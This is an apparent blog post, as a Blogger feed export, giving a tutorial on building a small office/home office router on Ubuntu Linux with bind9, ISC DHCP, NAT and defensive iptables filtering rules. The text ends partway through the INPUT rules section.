tag:blogger.com,1999:blog-23202766218793945532023-12-04T01:04:04.889-08:00Net = Packet Header != Security ? 0 : 1This blog contains information security, penetration testing, and network architecture materials.Unknownnoreply@blogger.comBlogger25125tag:blogger.com,1999:blog-2320276621879394553.post-7633155627941154972016-03-01T14:15:00.003-08:002016-03-01T14:15:33.586-08:00How to create a SOHO router using Ubuntu Linux<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On Security Weekly Episode 452, I presented a technical segment on how to build your own small office / home office wired router. This blog post will list of the essential components, and expand upon the technical segment. Our goal is to build a multi-segment wired router that performs Network Address Translation (NAT) with IPv4, runs Internet Software Consortium (ISC) Bind9 for domain name service, and ISC DHCP services to deliver IP addresses on the inside of your network. </span></b></div>
<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">NOTE: Supporting configuration files associated with this blog post can be found at </span><a href="https://bitbucket.org/jsthyer/soho_router" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://bitbucket.org/jsthyer/soho_router</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">From a hardware standpoint, you can choose any dual NIC or higher computer that will support an Ubuntu 14.04.4 LTS server installation. I would recommend a minimum of 1024MB (1GB) of RAM, and 16GB of hard disk space. Some hardware that I have found useful includes the Soekris Net6501 ( </span><a href="http://soekris.com/products/net6501-1.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://soekris.com/products/net6501-1.html</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">), or the Netgate RCC-VE 2440 (</span><a href="http://store.netgate.com/ADI/RCC-VE-2440.aspx" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://store.netgate.com/ADI/RCC-VE-2440.aspx</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">).</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The starting point for building the router is to install Ubuntu-14.04.4 LTS server (64-bit), and then install the following additional packages:</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">apt-get install bind9</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">apt-get install isc-dhcp-server</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">apt-get install ntp</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The next and very important step is to ensure that IP forwarding is turned on in your kernel. If you don’t do this, you don’t route any packets and the game is over. In order to enable IP forwarding, please add the following lines to the bottom of the /etc/sysctl.conf file, and reboot your system. Note that while we at changing the system configuration, we will disable IPv6 since you are probably not using it.</span></b><br />
<br />
<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b id="docs-internal-guid-1ad7e20a-343f-6615-08df-d2c8c7193354" style="font-weight: normal;"><br /></b></span></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"><b id="docs-internal-guid-1ad7e20a-343f-6615-08df-d2c8c7193354" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b id="docs-internal-guid-1ad7e20a-343f-c34b-ecaf-5f4966a54496" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b></span></b></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"><b id="docs-internal-guid-1ad7e20a-343f-6615-08df-d2c8c7193354" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b id="docs-internal-guid-1ad7e20a-343f-c34b-ecaf-5f4966a54496" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="70" src="https://lh5.googleusercontent.com/QbErAA95s_6JiH8vWRveNAN34AeqqVoBW2VFneOSBzZPoayMsFX9aj6HzZWH13A6Ii3TSjGl0ThEcWP1nIHp_iMkobDDpUYCcakEYqLIU44yYDag2ilLArCHXeEfVEG0sLUo0zev" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="414" /></span></b> </span></b></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"><b id="docs-internal-guid-1ad7e20a-343f-6615-08df-d2c8c7193354" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/sysctl.conf</span></b></b></div>
<b id="docs-internal-guid-1ad7e20a-343e-f1a1-234b-e76e66609527" style="font-weight: normal;"><b id="docs-internal-guid-1ad7e20a-343f-6615-08df-d2c8c7193354" style="font-weight: normal;"><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The core of the configuration for a router is to make sure that your network interfaces are configured properly, and that your IPTABLES configuration is setup to properly translate, and forward traffic to the Internet.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Network Interface Configuration</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Starting with network interfaces, we will assume that your public Internet address can either be static or obtained via DHCP. We will assign the Linux network interface “eth0” to be the Wide Area Network (WAN) connection to your Internet Service Provider. Just for demonstration purposes, we will assume a static Internet address of 255.1.1.2 and a network mask of /30. Your ISP’s device will be assigned 255.1.1.1. Your public network subnet mask is calculated using the following math: subnet mask = 2^32 - 2^(32-30) ⇒ 255.255.255.252 in dot quad notation. We will also assume that you have a total of four network interfaces on your router device which will yield up to three internal network segments. </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Listed below is the top section of what will be the /etc/network/interfaces file. This not only contains the “eth0” definition, but also contains some addition security features in the form of “null routes” for any RFC1918 network traffic that appears with a shorter prefix than the connected interfaces, and also routes multicast (224.0.0.0/4) to the bit bucket. If you need to use DHCP for your Internet public address, you can un-comment the marked entries for the “eth0” interface that starts with “using dhcp”, and comment out the static address part. One more aspect is that the iptables rules are expected to be listed in /etc/iptables.rules. More about this later in the article.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="430" src="https://lh5.googleusercontent.com/lMFBoaOdMCw09gY8DQAbtAQQkimM6EdW5lYI9-StqGCkjHwiY6z2WnL3AlYjE0u1Znh0PZzxok_JbGzkUfny1e8pCFxyagDPwDGGdOLeEYurbMLXVTNTcU_j_eeYeEy6TvoWUmum" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="501" /></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/network/interfaces</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now we need to establish what the internal / inside interfaces of our network look like. For simplicity, we will use class C (/24) networks and assign them the addresses 10.1.1.0/24, 10.1.2.0/24, and 10.1.3.0/24 respectively. This is how you configure the remainder of the /etc/network/interfaces file to reflect this.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="296" src="https://lh3.googleusercontent.com/YgboQ7BOtoVMoNSTHVDDLsBH5-6oPpsfpDVFlc46yyZ2dSDE3Ou0f2Bz8svD0eQoEL8TschaDKDNVvYj6nJZ-HTH5kf4SI32OdmP6V4r2xZt8eYS-UFlZH4GMdRTyjWtDaPuzU_7" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="239" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/network/interfaces</span></div>
<br /><br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IPTABLES Rules Configuration</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As listed in the network interfaces configuration file, we are going to create the file /etc/iptables.rules, and depend upon the networking code to load the configuration when the system boots. We can also test our iptables configuration at any time using the “iptables-restore” command. The IPTABLES configuration is broken into two sections, these being the Network Address Translation, and the Filtering section. In short, performing Network Address Translation with IPTABLES is a one liner. In this example, we assume that the internal network is addressed in the 10.0.0.0/8 range, and that the public Internet Protocol address (WAN interface) is configured on “eth0”. As a bonus, and if you want to run the Squid web proxy, there is a line to rewrite traffic on internal network segments destined to TCP port 80 to the standard Squid TCP port of 3128.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="276" src="https://lh5.googleusercontent.com/syPHuGLADCi4EIlGUqz8rzn7uyJ-V86NVb-oPxa6stNK73v_oEiKto_oHZ3Qc1Y1yUJSHpiQuWcS2qF6s3p3LrYcA6nEoqHzgCgqudCoR9a1fsRZImekctF2ZMFhcE_AF-Dh4Yvx" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="527" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">NAT section of /etc/iptables.rules</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Having created the NAT section of the iptables ruleset, you are still required to create the filtering rules to determine what is going to ingress and egress your actual gateway router system, as well as determine what traffic will forward across your router. </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I am going to break the filter section of the IPTABLES rules down into multiple different parts of this article, these being:</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Traffic being received by the router (INPUT)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Traffic being sent by the router (OUTPUT)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Traffic being forwarded across the router (FORWARD)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Traffic being logged by the router (LOG_DROPS)</span></div>
</li>
</ol>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We will start the filtering section of the IPTABLES configuration by adding a “LOG_DROPS” chain to the rule set. This will allow us to write logs on any traffic that is dropped. After that, we will implement some common sense network protections for the router itself which include:</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dropping any traffic to “eth0” that sources from 0.0.0.0/8</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dropping any traffic to “eth0” that sources from RFC1918 addresses</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dropping any traffic to “eth0” that sources from a multicast address (224.0.0.0/4)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dropping fragmented IP traffic</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dropping ingress packets that have an IP TTL less than 4.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dropping any packets destined to TCP/UDP port 0.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dropping any packets with all or no TCP flags set</span></div>
</li>
</ul>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="435" src="https://lh4.googleusercontent.com/rrbM3NC3CvfOR1fOiDexbAdKl0KJkIyUuXEK0l2lD8iswY_N6gu5PFIAvoB_WuHqz4TrQrsfu3_KJAeF4nYxWuO9zbU-bfD6FrCABSGiGspT2B0r14BOyb-Ft3XMcYtqOw0i_NSB" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="490" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Starting portion of “filter” section. Common sense protections.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In the next part of the INPUT section, we are defining the following rules for the router to receive traffic as follows:</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept all traffic to the Loopback interface. A lot of software will use Loopback for internal communications and it is better to not break things.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept traffic for the Domain Name Service (DNS) bind9 server on any interface. This is needed because we are running bind9 on the router itself, and we might likely decide to host some of our own DNS zones.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept specific traffic from our internal network. This includes DNS, DHCP server requests, network time protocol, and Squid traffic (if you choose to run Squid).</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept internet control message protocol (ICMP).</span></div>
</li>
</ul>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="277" src="https://lh3.googleusercontent.com/0ecs9MefBBtI53l_6-sfnv9m77feSYWNuQJd4yLTq8HDVqcHELDAjnpsl28q2t4eZFareFsUo193p3fKfn9wMxCE9VOeti_R_PkoA4zhwkW8z4wvIHoOX_Bau5ERKj5OzbUcIFGR" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="461" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Packet input/ingress (to router) section of “filter” section</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
